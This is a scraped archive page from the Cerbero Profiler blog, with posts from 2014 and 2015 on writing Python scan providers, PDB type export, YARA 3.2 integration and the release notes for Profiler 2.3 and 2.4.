self.addEntry(e)</pre> <p>The code above will issue a single warning concerning native code. When <strong>_startScan</strong> returns <strong>SCAN_RESULT_OK</strong>, <strong>_threadScan</strong> will be called from a thread other than the main UI one. The logic behind this is that <strong>_startScan</strong> is actually called from the main thread and if the scan of the file doesn’t require complex operations, like in the case above, then the method could return <strong>SCAN_RESULT_FINISHED</strong> and then <strong>_threadScan</strong> won’t be called at all. During a threaded scan, an abort by the user can be detected via the <strong>isAborted</strong> method.</p> <p>From the UI side point of view, when a scan entry is clicked in summary, the scan provider is supposed to return UI information. </p> <pre lang="python"> def _scanViewData(self, xml, dnode, sdata):
if sdata.type == CT_NativeCode:
sdata.setViews(SCANVIEW_TEXT)
sdata.data.setData("Hello, world!")
return True
return False</pre> <p>This will display a text field with a predefined content when the user clicks the scan entry in the summary. This is fairly easy, but what happens when we have several entries of the same type and need to differentiate between them? There’s where the <strong>data</strong> member of <strong>ScanEntryData</strong> plays a role, this is a string which will be included in the report xml and passed again back to <strong>_scanViewData</strong> as an xml node.</p> <p>For instance:</p> <pre lang="python">e.data = "<o>1234</o>"</pre> <p>Becomes this in the final XML report:</p> <pre lang="xml"><d>
<o>1234</o>
</d></pre> <p>The <strong>dnode</strong> argument of <strong>_scanViewData</strong> points to the ‘d’ node and its first child will be the ‘o’ node we passed. the <strong>xml</strong> argument represents an instance of the <strong>NTXml</strong> class, which can be used to retrieve the children of the <strong>dnode</strong>.</p> <p>But this is only half of the story: some of the scan entries may represent embedded files (category <strong>SEC_File</strong>), in which case the <strong>_scanViewData</strong> method must return the data representing the file.</p> <p>Apart from scan entries, we may also want the user to explore the format of the file. To do that we must return a tree representing the structure of our file:</p> <pre lang="python"> def _getFormat(self):
ft = FormatTree()
ft.enableIDs(True)
fi = ft.appendChild(None, 1)
ft.appendChild(fi, 2)
return ft</pre> <p>The <strong>enableIDs</strong> method must be called right after creating a new <strong>FormatTree</strong> class. The code above creates a format item with id 1 with a child item with id 2, which results in the following:</p> <p><a href="/wp-content/uploads/2015/09/scanp/format.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/format.png" alt="Format tree"></a></p> <p>But of course, we haven’t specified neither labels nor different icons in the function above. This information is retrieved for each item when required through the following method:</p> <pre lang="python"> def _formatViewInfo(self, finfo):
if finfo.fid == 1:
finfo.text = "directory"
finfo.icon = PubIcon_Dir
return True
elif finfo.fid == 2:
finfo.text = "entry"
return True
return False</pre> <p>The various items are identified by their id, which was specified during the creation of the tree.</p> <p>The UI data for each item is retrieved through the <strong>_formatViewData</strong> method:</p> <pre lang="python"> def _formatViewData(self, sdata):
if sdata.fid == 1:
sdata.setViews(SCANVIEW_CUSTOM)
sdata.data.setData("<ui><hsplitter csizes="40-*"></hsplitter></ui></pre></div></article><table id="1">
</table><hex id="2">")
sdata.setCallback(cb, None)
return True
return False <p>This will display a custom view with a table and a hex view separated by a splitter:</p> <p><a href="/wp-content/uploads/2015/09/scanp/cview.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/cview.png" alt="Custom view"></a></p> <p>Of course, also have specified the callback for our custom view:</p> <pre lang="python">def cb(cv, ud, code, view, data):
if code == pvnInit:
return 1
return 0</pre> <p>It is good to remember that format item IDs and IDs used in custom views are used to encode bookmark jumps. So if they change, saved bookmark jumps become invalid.</p> <p>And here again the whole code for a better overview:</p> <pre lang="python">from Pro.Core import *
from Pro.UI import pvnInit, PubIcon_Dir
class TestObject(CFFObject):
def __init__(self):
super(TestObject, self).__init__()
self.SetObjectFormatName("TEST")
self.SetDefaultEndianness(ENDIANNESS_LITTLE)
def cb(cv, ud, code, view, data):
if code == pvnInit:
return 1
return 0
class TestScanProvider(ScanProvider):
def __init__(self):
super(TestScanProvider, self).__init__()
self.obj = None
def _clear(self):
self.obj = None
def _getObject(self):
return self.obj
def _initObject(self):
self.obj = TestObject()
self.obj.Load(self.getStream())
return self.SCAN_RESULT_OK
def _startScan(self):
return self.SCAN_RESULT_OK
def _threadScan(self):
print("thread msg")
e = ScanEntryData()
e.category = SEC_Warn
e.type = CT_NativeCode
self.addEntry(e)
def _scanViewData(self, xml, dnode, sdata):
if sdata.type == CT_NativeCode:
sdata.setViews(SCANVIEW_TEXT)
sdata.data.setData("Hello, world!")
return True
return False
def _getFormat(self):
ft = FormatTree()
ft.enableIDs(True)
fi = ft.appendChild(None, 1)
ft.appendChild(fi, 2)
return ft
def _formatViewInfo(self, finfo):
if finfo.fid == 1:
finfo.text = "directory"
finfo.icon = PubIcon_Dir
return True
elif finfo.fid == 2:
finfo.text = "entry"
return True
return False
def _formatViewData(self, sdata):
if sdata.fid == 1:
sdata.setViews(SCANVIEW_CUSTOM)
sdata.data.setData("<ui><hsplitter csizes="40-*"></hsplitter></ui></pre></hex><table id="1"></table><hex id="2">")
sdata.setCallback(cb, None)
return True
return False
def allocator():
return TestScanProvider() <p>If you have noticed from the screen-shot above, the analysed file is called ‘a.t’ and as such doesn’t automatically associate to our ‘test’ format. So how does it associate anyway?</p> <p>Clearly Profiler doesn’t rely on extensions alone to identify the format of a file. For external scan providers a signature mechanism based on YARA has been introduced. In the <strong>config</strong> directory of the user, you can create a file named ‘yara.plain’ and insert your identification rules in it, e.g.:</p> <pre lang="text">rule test
{
strings:
$sig = "test"
condition:
$sig at 0
}</pre> <p>This rule will identify the format as ‘test’ if the first 4 bytes of the file match the string ‘test’: the name of the rule identifies the format.</p> <p>The file ‘yara.plain’ will be compiled to the binary ‘yara.rules’ file at the first run. In order to refresh ‘yara.rules’, you must delete it.</p> <p>One important thing to remember is that a rule isn’t matched against an entire file, but only against the first 512 bytes.</p> <p>Of course, our provider behaves 100% like all other providers and can be used to load embedded files:</p> <p><a href="/wp-content/uploads/2015/09/scanp/embfiles.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/embfiles.png" alt="Embedded files"></a></p> <p>Our new provider is used automatically when an embedded file is identified as matching our format.</p><footer class="entry-footer">
<span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/scan-providers/" rel="bookmark"><time class="entry-date published" datetime="2015-09-21T22:13:50+00:00">September 21, 2015</time><time class="updated" datetime="2021-04-01T16:32:53+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="comments-link"><a href="https://blog.cerbero.io/scan-providers/#respond">Leave a comment<span class="screen-reader-text"> on Scan Providers</span></a></span> </footer>
<article id="post-1539" class="post-1539 post type-post status-publish format-standard hentry category-suite-standard tag-command-line tag-news">
<header class="entry-header">
<h2 class="entry-title"><a href="https://blog.cerbero.io/profiler-2-4/" rel="bookmark">Profiler 2.4</a></h2> </header>
<div class="entry-content"> <p>Profiler 2.4 is out with the following news:</p> <p>– <a href="/?p=1530">added initial support for PDB files (including export of types)</a><br> – <a href="#wscript">added support for Windows Encoded Scripts (VBE, JSE)</a><br> – introduced fixed xml structures<br> – <a href="#sdec">added automatic string decoding in struct tables</a><br> – <a href="#pyline">added Python string command line execution</a><br> – remember the last selected logic group<br> – fixed missing support for wchar_t in C types<br> – updated Qt to 5.4.1<br> – various bug fixes</p> <p>While the most important newly introduced feature is the support for PDB files, here are some interesting new features:</p> <p><a name="wscript"></a></p> <h2>Support for Windows Encoded Scripts (VBE, JSE)</h2> <p>Windows encoded scripts like VBE and JSE files (the encoded variants of VBS and JS script files) are now supported and automatically decoded.</p> <p><a href="/wp-content/uploads/2015/06/24/wscript.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/24/wscript.png"></a></p> <p>In the screen-shot you can see the decoded output of an encoded file (showed at the bottom).</p> <p><a name="sdec"></a></p> <h2>Automatic string decoding in struct tables</h2> <p>A very basic feature: byte-arrays in structures are automatically checked for strings and in case decoded.</p> <p><a href="/wp-content/uploads/2015/06/24/sdec.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/24/sdec.png"></a></p> <p>(notice the section name automatically displayed as ascii string)</p> <p><a name="pyline"></a></p> <h2>Python string command line execution</h2> <p>Apart from <a href="/?p=1464">executing script files passed as command line arguments</a>, now it is also possible to execute Python statements directly passed as argument. </p> <p>For instance:</p> <pre lang="text">cerpro -c -e "from Pro.Core import *;proCoreContext().msgBox(0, \"Hello world!\")"</pre> <p>The optional argument ‘-c’ specifies to not display the UI.</p> <p>Enjoy!</p></div><footer class="entry-footer">
<span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/profiler-2-4/" rel="bookmark"><time class="entry-date published" datetime="2015-06-06T16:43:45+00:00">June 6, 2015</time><time class="updated" datetime="2021-04-01T16:33:35+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/command-line/" rel="tag">Command-line</a>, <a href="https://blog.cerbero.io/tag/news/" rel="tag">News</a></span><span class="comments-link"><a href="https://blog.cerbero.io/profiler-2-4/#respond">Leave a comment<span class="screen-reader-text"> on Profiler 2.4</span></a></span> </footer>
</article>
<article id="post-1530" class="post-1530 post type-post status-publish format-standard hentry category-suite-standard tag-headers tag-pdb tag-python tag-sdk">
<header class="entry-header">
<h2 class="entry-title"><a href="https://blog.cerbero.io/pdb-support-including-export-of-types/" rel="bookmark">PDB support (including export of types)</a></h2> </header>
<div class="entry-content"> <p>The main feature of the upcoming 2.4 version of Profiler is the initial support for the PDB format. Our code doesn’t rely on the Microsoft DIA SDK and thus works also on OS X and Linux.</p> <p>Since the PDB format is undocumented, this task would’ve been extremely difficult without the <a href="http://undocumented.rawol.com/">fantastic work on PDBs</a> of the never too much revered Sven B. Schreiber.</p> <p>Let’s open a PDB file.</p> <p><a href="/wp-content/uploads/2015/06/pdb/streams.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/streams.png"></a></p> <p>As you can see the streams in the PDB can be explored. The TPI stream (the one describing types) offers further inspection.</p> <p><a href="/wp-content/uploads/2015/06/pdb/tpi.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/tpi.png"></a></p> <p>All the types contained in the PDB can be exported to a Profiler header by pressing Ctrl+R and executing the ‘Dump types to header’ action.</p> <p><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/action.png"></p> <p>Now the types can be used from both the hex editor and the Python SDK. </p> <p><a href="/wp-content/uploads/2015/06/pdb/hexed.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/hexed.png"></a></p> <p>We can explore the dumped header by using, as usual, the Header Manager tool.</p> <p><a href="/wp-content/uploads/2015/06/pdb/hdrmgr.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/hdrmgr.png"></a></p> <p>The type showed above in the hex editor is simple. So let’s look what a more complex PDB type may look like.</p> <pre lang="xml"><r id="CWnd" type="class" size="84">
<b>
<b type="CCmdTarget" offset="0" access="public">
</b>
<m id="_GetBaseClass" type="CRuntimeClass * ()">
<s id="classCWnd" type="CRuntimeClass const">
<m id="GetThisClass" type="CRuntimeClass * ()">
<m id="GetRuntimeClass" type="CRuntimeClass * ()">
<m id="CreateObject" type="CObject * ()">
<m id="GetCurrentMessage" type="tagMSG const * ()">
<f id="m_hWnd" type="HWND__ *" offset="32">
<m id="operator struct HWND__ *" type="HWND__ * ()">
<m id="operator==" type="int32 (CWnd const *)">
<m id="operator!=" type="int32 (CWnd const *)">
<m id="GetSafeHwnd" type="HWND__ * ()">
<m id="GetStyle" type="unsigned int ()">
<m id="GetExStyle" type="unsigned int ()">
<m id="ModifyStyle" type="int32 (HWND__ *, unsigned int, unsigned int, uint32)">
<m id="ModifyStyle" type="int32 (unsigned int, unsigned int, uint32)">
<m id="ModifyStyleEx" type="int32 (HWND__ *, unsigned int, unsigned int, uint32)">
<m id="ModifyStyleEx" type="int32 (unsigned int, unsigned int, uint32)">
<m id="GetOwner" type="CWnd * ()">
<m id="SetOwner" type="void (CWnd *)">
<m id="GetWindowInfo" type="int32 (tagWINDOWINFO *)">
<m id="GetTitleBarInfo" type="int32 (tagTITLEBARINFO *)">
<m id="CWnd" type="void (CWnd const *)">
<m id="CWnd" type="void (HWND__ *)">
<m id="CWnd" type="void ()">
<m id="FromHandle" type="CWnd * (HWND__ *)">
<m id="FromHandlePermanent" type="CWnd * (HWND__ *)">
<m id="DeleteTempMap" type="void ()">
<!-- etc. -->
</m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></f></m></m></m></m></s></m></b></r></pre><b><s id="classCWnd" type="CRuntimeClass const"> <p>The PDB code is also exposed to the SDK. This is a small snippet of code, which dumps all the types to a text buffer and then displays them in a text view.</p> <pre lang="python">from Pro.Core import *
from Pro.UI import *
from Pro.PDB import *
def showPDBTypes():
ctx = proContext()
out = proTextStream()
out.setIndentSize(4)
obj = ctx.currentScanProvider().getObject()
tpi = obj.GetStreamObject(PDB_STREAM_ID_TPI)
tpihdr = obj.TPIHeader(tpi)
tiMin = tpihdr.Num("tiMin")
tiMax = tpihdr.Num("tiMax")
tctx = obj.CreateTypeContext(tpi)
for ti in range(tiMin, tiMax):
tctx.DumpType(out, ti)
view = ctx.createView(ProView.Type_Text, "PDB Test")
view.setLanguage("XML")
view.setText(out.buffer)
ctx.addView(view)
showPDBTypes()</pre> <p><a href="/wp-content/uploads/2015/06/pdb/pyresult.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/pyresult.png"></a></p> <p>In order to dump all types to a single header, you can use the <strong>DumpAllToHeader</strong> method.</p></s></b></div><footer class="entry-footer"><b><s id="classCWnd" type="CRuntimeClass const">
<span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/pdb-support-including-export-of-types/" rel="bookmark"><time class="entry-date published" datetime="2015-06-01T08:09:04+00:00">June 1, 2015</time><time class="updated" datetime="2021-04-01T16:34:10+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/headers/" rel="tag">Headers</a>, <a href="https://blog.cerbero.io/tag/pdb/" rel="tag">PDB</a>, <a href="https://blog.cerbero.io/tag/python/" rel="tag">Python</a>, <a href="https://blog.cerbero.io/tag/sdk/" rel="tag">SDK</a></span><span class="comments-link"><a href="https://blog.cerbero.io/pdb-support-including-export-of-types/#respond">Leave a comment<span class="screen-reader-text"> on PDB support (including export of types)</span></a></span> </s></b></footer><b><s id="classCWnd" type="CRuntimeClass const">
</s></b></article><b><s id="classCWnd" type="CRuntimeClass const">
<article id="post-1519" class="post-1519 post type-post status-publish format-standard hentry category-suite-standard tag-news">
<header class="entry-header">
<h2 class="entry-title"><a href="https://blog.cerbero.io/profiler-2-3/" rel="bookmark">Profiler 2.3</a></h2> </header>
<div class="entry-content"> <p>Profiler 2.3 is out with the following news:</p> <p>– <a href="/?p=1506">introduced YARA 3.2 support</a><br> – <a href="#lgroups">added groups for logic providers</a><br> – <a href="#enctxt">added Python action to encode/decode text</a><br> – <a href="#x2t">added Python action to strip XML down to text</a><br> – <a href="#fixfont">added the possibility to choose the fixed font</a><br> – <a href="#colrand">added color randomization for structs and intervals</a><br> – <a href="#repapis">added close report and quit APIs</a><br> – <a href="#repapis">exposed more methods of the Report class (including save)</a><br> – improved indentation handling in the script editor<br> – <a href="#outsync">synchronized main and workspace output views</a><br> – improved output view<br> – updated libmagic to 5.21<br> – updated Capstone to 3.0<br> – many small improvements<br> – fixed libmagic on Linux<br> – removed the tray icon<br> – minor bug fixes</p> <p><a name="lgroups"></a></p> <h2>Logic provider groups</h2> <p>Logic providers can now be grouped in order to avoid clutter in the main window. Adding the following line to an existing logic provider will result in a new group being created:</p> <pre lang="python">group = Extra</pre> <p><a href="/wp-content/uploads/2014/12/23/lgroups.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/lgroups.png"></a></p> <p><a name="enctxt"></a></p> <h2>Encode/decode text action</h2> <p>A handy Python action to convert from hex to text and vice-versa using all of Python’s supported encodings. Place yourself in a hex or text view and run the encoding/decoding action ‘Bytes to text’ or ‘Text to bytes’.</p> <p><a href="/wp-content/uploads/2014/12/23/enctext.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/enctext.png"></a></p> <p>The operation will open a new text or hex view depending if it was an encoding or a decoding. </p> <p><a name="x2t"></a></p> <h2>XML to text action</h2> <p>Strips tags from an XML and displays only the text. The action can be performed both on a hex and text view. </p> <p><a href="/wp-content/uploads/2014/12/23/x2t.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/x2t.png"></a></p> <p>And it will open a new text view. This is useful to view the text of a DOCX or ODT document. In the future the preview for these documents will be made available automatically, but in the meantime this action is helpful.</p> <p><a href="/wp-content/uploads/2014/12/23/docxprev.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/docxprev.png"></a></p> <p><a name="fixfont"></a></p> <h2>Fixed font preferences</h2> <p>The fixed font used in most views can now be chosen from the ‘General’ settings.</p> <p><a name="colrand"></a></p> <h2>Struct/intervals color randomization</h2> <p>When adding a structure or interval to the hex view the chosen color is now being randomized every time the dialog shows up. This behaviour can be disabled from the dialog itself and it’s also possible to randomize again the color by clicking on the specific refresh button.</p> <p><a href="/wp-content/uploads/2014/12/23/colrand.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/colrand.png"></a></p> <p>Manually picking a different color for every interval is time consuming and so this feature should speed up raw data analysis.</p> <p><a name="repapis"></a></p> <h2>Report APIs</h2> <p>Most of the report APIs have been exposed (check out the SDK documentation). This combined with the newly introduced ‘quit’ SDK method can be used to perform custom scans programmatically and save the resulting report.</p> <p>Here’s a small example which can be launched from the command line:</p> <pre lang="python">from Pro.Core import *
import sys
ctx = proCoreContext()
def init():
ctx.getSystem().addFile(sys.argv[1])
return True
def rload():
ctx.unregisterLogicProvider("test_logic")
ctx.getReport().saveAs("auto.cpro")
ctx.quit()
ctx.registerLogicProvider("test_logic", init, None, None, None, rload)
ctx.startScan("test_logic")</pre> <p>The command line syntax to run this script would be:</p> <pre lang="text">cerpro -r scan.py [file to scan]</pre> <p>The UI will show up and close automatically once the ‘quit’ method is called. Running this script in console mode using the ‘-c’ parameter is not yet possible, because of the differences in message handling on different platforms, but it will be in the future.</p> <p><a name="outsync"></a></p> <h2>Synchronized output views</h2> <p>The output view of the main window and of the workspace are now synchronized, thus avoiding missing important log messages being printed in one or the other context.</p> <p>Enjoy!</p></div><footer class="entry-footer">
<span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/profiler-2-3/" rel="bookmark"><time class="entry-date published" datetime="2014-12-27T02:16:53+00:00">December 27, 2014</time><time class="updated" datetime="2021-04-01T16:34:49+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/news/" rel="tag">News</a></span><span class="comments-link"><a href="https://blog.cerbero.io/profiler-2-3/#respond">Leave a comment<span class="screen-reader-text"> on Profiler 2.3</span></a></span> </footer>
</article>
<article id="post-1506" class="post-1506 post type-post status-publish format-standard hentry category-action category-suite-standard tag-signatures tag-yara">
<header class="entry-header">
<h2 class="entry-title"><a href="https://blog.cerbero.io/yara-3-2-0-support/" rel="bookmark">YARA 3.2.0 support</a></h2> </header>
<div class="entry-content"> <p>The upcoming 2.3 version of Profiler includes support for the latest YARA engine. This new release is scheduled for the first week of January and it will include YARA on all supported platforms.</p> <p>One inherent technical advantage of having YARA support in Profiler is that it will be possible to scan for YARA rules inside embedded files/objects, like files in a Zip archive, in a CHM file, in an OLEStream, streams in a PDF, etc.</p> <p>The YARA engine itself has been compiled with all standard modules (except for cuckoo). Even the <strong>magic</strong> module is available, since libmagic is also supported by Profiler.</p> <p>The initial YARA integration comes as a hook extension, an action and Python SDK support. The YARA Python support is the official one and differs from it only in the import statement. You can run existing YARA Python code without modification by using the following import syntax:</p> <pre lang="python">import Pro.yara as yara</pre> <p>So let’s start a YARA scan. To do that, we need to enable the YARA hook extension. On Windows remember to configure Python in case you haven’t yet, since all extensions have been written in it.</p> <p><a href="/wp-content/uploads/2014/12/yara/1.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/1.png"></a></p> <p>When a scan is started, a YARA settings dialog will show up. </p> <p><a href="/wp-content/uploads/2014/12/yara/2.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/2.png"></a></p> <p>This dialog lets us choose various settings including the type of rules to load.</p> <p><a href="/wp-content/uploads/2014/12/yara/3.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/3.png"></a></p> <p>There are four possibilities. A simple text field containing YARA rules, a plain text rules file, a compiled rules file or a custom expression which must <strong>eval</strong> to a valid <strong>Rules</strong> object.</p> <p>The report settings specify how we will be alerted of matches. The ‘only matches’ option makes sure that only files (or their sub-files) with a match will be included in the final report. The ‘add to meta-data” option causes the matches to be visible as meta-data strings of a file. The ‘as threats’ option reports every match as a 100% risk threat. The ‘print to output’ option prints the matches to the output view.</p> <p>Since we had the ‘only matches’ option enabled, we will find only matching files in our final report.</p> <p><a href="/wp-content/uploads/2014/12/yara/4.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/4.png"></a></p> <p>And since we had also the ‘to meta-data’ option enabled, we will see the matches when opening a file in the workspace.</p> <p><a href="/wp-content/uploads/2014/12/yara/5.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/5.png"></a></p> <p>The YARA scan functionality comes also as an action when we find ourselves in a hex view. You can either scan the whole hex data or select a range. Then press Ctrl+R to run an action and select ‘YARA scan’.</p> <p><a href="/wp-content/uploads/2014/12/yara/6.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/6.png"></a></p> <p>In this case we won’t be given report options, since the only thing which can be performed is to print out matches in the output view.</p> <p><a href="/wp-content/uploads/2014/12/yara/7.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/7.png"></a></p> <p>Like this:</p> <p><a href="/wp-content/uploads/2014/12/yara/8.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/8.png"></a></p> <p>Of course, all supported platforms come also with the official YARA command line utility.</p> <p><a href="/wp-content/uploads/2014/12/yara/9.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/9.png"></a></p> <p>Since this has been a customer request for quite some time, I think it will be appreciated by some of our users.</p></div><footer class="entry-footer">
<span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/yara-3-2-0-support/" rel="bookmark"><time class="entry-date published" datetime="2014-12-26T02:19:13+00:00">December 26, 2014</time><time class="updated" datetime="2021-04-01T16:35:26+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/action/" rel="category tag">Action</a>, <a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/signatures/" rel="tag">signatures</a>, <a href="https://blog.cerbero.io/tag/yara/" rel="tag">YARA</a></span><span class="comments-link"><a href="https://blog.cerbero.io/yara-3-2-0-support/#respond">Leave a comment<span class="screen-reader-text"> on YARA 3.2.0 support</span></a></span> </footer>
</article>
<nav class="navigation pagination" aria-label="Posts pagination">
<h2 class="screen-reader-text">Posts pagination</h2>
<div class="nav-links"><a class="prev page-numbers" href="https://blog.cerbero.io/page/16/">Previous page</a> <a class="page-numbers" href="https://blog.cerbero.io/"><span class="meta-nav screen-reader-text">Page </span>1</a> <span class="page-numbers dots">…</span> <a class="page-numbers" href="https://blog.cerbero.io/page/16/"><span class="meta-nav screen-reader-text">Page </span>16</a> <span aria-current="page" class="page-numbers current"><span class="meta-nav screen-reader-text">Page </span>17</span> <a class="page-numbers" href="https://blog.cerbero.io/page/18/"><span class="meta-nav screen-reader-text">Page </span>18</a> <span class="page-numbers dots">…</span> <a class="page-numbers" href="https://blog.cerbero.io/page/27/"><span class="meta-nav screen-reader-text">Page </span>27</a> <a class="next page-numbers" href="https://blog.cerbero.io/page/18/">Next page</a></div></nav>
<aside id="secondary" class="sidebar widget-area">
<section id="search-2" class="widget widget_search">
<form role="search" method="get" class="search-form" action="https://blog.cerbero.io/"></form>
<label>
<span class="screen-reader-text">
Search for: </span>
<input type="search" class="search-field" placeholder="Search …" value="" name="s">
</label>
<button type="submit" class="search-submit"><span class="screen-reader-text">
Search </span></button>
</section>
<section id="recent-posts-2" class="widget widget_recent_entries">
<h2 class="widget-title">Recent Posts</h2><nav aria-label="Recent Posts">
<ul>
<li> <a href="https://blog.cerbero.io/wim-format-package/" aria-current="page">WIM Format Package</a> </li>
<li> <a href="https://blog.cerbero.io/hfs-file-system/">HFS+ File System</a> </li>
<li> <a href="https://blog.cerbero.io/ext-file-systems/">EXT File Systems</a> </li>
<li> <a href="https://blog.cerbero.io/ntfs-file-system/">NTFS File System</a> </li>
<li> <a href="https://blog.cerbero.io/exfat-file-system/">ExFAT File System</a> </li>
<li> <a href="https://blog.cerbero.io/disk-format-package/">Disk Format Package</a> </li>
<li> <a href="https://blog.cerbero.io/fat-file-system/">FAT File System</a> </li>
<li> <a href="https://blog.cerbero.io/prototype-memory-services/">Prototype Memory & Services</a> </li>
<li> <a href="https://blog.cerbero.io/iso-format-2-0-package/">ISO Format 2.0 Package</a> </li>
<li> <a href="https://blog.cerbero.io/memory-decompression-pagefiles/">Memory Decompression & Pagefiles</a> </li>
</ul>
</nav></section><section id="archives-4" class="widget widget_archive"><h2 class="widget-title">Archives</h2> <label class="screen-reader-text" for="archives-dropdown-4">Archives</label>
<select id="archives-dropdown-4" name="archive-dropdown">
<option value="">Select Month</option>
<option value="https://blog.cerbero.io/2025/06/"> June 2025 (1)</option>
<option value="https://blog.cerbero.io/2025/05/"> May 2025 (7)</option>
<option value="https://blog.cerbero.io/2025/04/"> April 2025 (4)</option>
<option value="https://blog.cerbero.io/2025/03/"> March 2025 (2)</option>
<option value="https://blog.cerbero.io/2024/10/"> October 2024 (3)</option>
<option value="https://blog.cerbero.io/2024/09/"> September 2024 (1)</option>
<option value="https://blog.cerbero.io/2024/08/"> August 2024 (3)</option>
<option value="https://blog.cerbero.io/2024/07/"> July 2024 (5)</option>
<option value="https://blog.cerbero.io/2024/06/"> June 2024 (2)</option>
<option value="https://blog.cerbero.io/2024/04/"> April 2024 (4)</option>
<option value="https://blog.cerbero.io/2024/03/"> March 2024 (1)</option>
<option value="https://blog.cerbero.io/2024/02/"> February 2024 (1)</option>
<option value="https://blog.cerbero.io/2024/01/"> January 2024 (4)</option>
